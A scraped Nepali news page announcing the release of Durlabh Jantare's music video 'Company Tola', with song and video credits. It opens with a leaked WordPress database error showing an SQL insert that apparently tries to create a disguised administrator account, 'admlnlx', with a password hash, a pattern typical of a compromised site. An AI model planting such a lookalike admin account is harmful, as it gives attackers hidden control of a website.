WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BNFBrUIG4LlOQLwRX33fnYFBBvtDS7/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 13:46:08', '', 'admlnlx', 'admlnlx')

दुर्लभ जन्तरेको कम्पनी तोला सार्वजनिक (भिडियो सहित) – Gaule Khabar

दुर्लभ जन्तरेको कम्पनी तोला सार्वजनिक (भिडियो सहित)

दुर्लभ जन्तरेको कम्पनी तोला सार्वजनिक (भिडियो सहित)

काठमाण्डौं । निर्देशक तथा गितकार दुर्लभ जन्तरेको कम्पनी तोला बोलको गीतको म्यूजिक भिडियो सार्वजनिक भएको छ ।

आज काठमाण्डौमा एक विशेष कार्यक्रम बीच उक्त गितको म्यूजिक भिडियोलाई सार्वजनिक गरिएको हो ।

उक्त गीतमा दुर्लभ जन्तरेको शब्द, कृष्णभक्त राईको संगित संयोजन, टेक नाछिरिङ को सङ्गीत, कृष्ण भक्त राई र मेलिना राईको स्वर रहेको छ ।
कम्पनि तोला गितको भिडियोमा कमल सिङ, सृजना किराती, अनुशा राई, छोङ्बा शेर्पा र दुर्लभ जन्तरेको अभिनय रहेको छ ।

उक्त म्यूजिक भिडियोमा दुर्लभ जन्तरेको निर्देशन, आशिष राईको कोरीयोग्राफि, गंगारमा राईको सिनेम्याटोग्राफी र बिष्णु खड्काको सम्पादन रहेको छ।

 

गितको भिडियो यहाँ हेर्नुहोला

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका